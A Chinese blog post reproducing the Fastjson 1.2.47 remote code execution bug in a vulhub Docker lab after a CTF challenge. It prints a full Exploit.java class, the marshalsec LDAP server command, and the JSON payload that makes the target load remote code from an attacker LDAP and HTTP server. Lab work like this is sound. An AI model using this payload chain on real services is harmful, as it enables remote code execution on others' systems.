我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个Fastjson的RCE漏洞。也就有了这篇文章。
环境准备为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码
一种是直接在github上down下来
https://github.com/vulhub/vulhub
还有一种是去Gitee上下载,两种并没有什么区别,Gitee是国内的,可能速度快一点?
https://gitee.com/puier/vulhub/
(当然这一步在linux系统中只需要git clone)
靶机用的是kali,攻击者用的是windows10
1.启动docker环境,进行环境搭建我们找到vulhub-master文件夹,在里面启动终端。然后输入cd fastjson/1.2.47-rce/
进入到目录后,我们输入docker-compose up -d启动docker环境。
这时候我们看一下本地的8090端口,是否已经启动服务
我们将网络设置为桥接模式,将虚拟机的网卡桥接到我们的物理网卡上。
看一下靶机的IP地址
我们从客户机进行访问,发现能够访问。那么,环境搭建完成。
我们要事先准备两个文件分别是Exploit.java以及marshalsec-0.0.3-SNAPSHOT-all.jar
其中Exploit.java的内容如下:
这个EXP的创意源自这位大佬
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec("touch fanxing");
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
将上述提到的两个文件放入同一个文件夹下,然后对Exploit.java进行编译
然后现在你的新文件夹下应该是这个样子的。
然后我们在刚创建的文件夹下启动cmd,然后用python启动一个web服务
python -m http.server //(python3) python -m SimpleHTTPServer //(python2)
效果大概是这样
然后我们访问一下本地的8000端口,确认到如下界面,就说明正常了。
如果之前的配置没有问题,在虚拟机中也可以通过ip:port的形式进行访问
然后还是在该目录下打开一个cmd窗口
输入java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#Exploit用来启动LDAP服务(这里的ip就是你攻击者的ip,port就是刚才python开启的端口)
然后用brup进行发包
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.1.5:1389/Exploit",
"autoCommit":true
}
}
上面的ip是攻击者的ip端口是开启LDAP服务的端口。
上面这个exp的原理找我的理解讲就是在name这个键值对中,利用checkautotype()函数将com.sun.rowset.JdbcRowSetImpl存入mappings中,这就导致了我们的第二个键值对在被程序接受的时候,绕过了checkAutoType的黑名单限制,从而拿到了一个com.sun.rowset.JdbcRowSetImpl对象并通过com.sun.rowset.JdbcRowSetImpl对象中的一些方法调用实现命令执行。
利用brup进行发包之后然LDAP服务会有反应。
去kali中查看命令执行情况。
应为我是用docker搭建的环境,所以所有的RCE都只会在docker内部的环境中得到显现,所以需要先输入docker exec -i 1247-rce_web_1 bash最后一个参数是容器名称
然后ls一下
发现他在目录下创建了名为fanxing的目录RCE成功。
在这次的复现过程中,很明显的一个问题就是,我最终并没有去getshell,因为我的这个环境从整体看来是不完整的,仍然被局限在了docker里面,所以拿不了shell。在复现过程中我也曾尝试把docker里的bash拿出来,但都失败了。
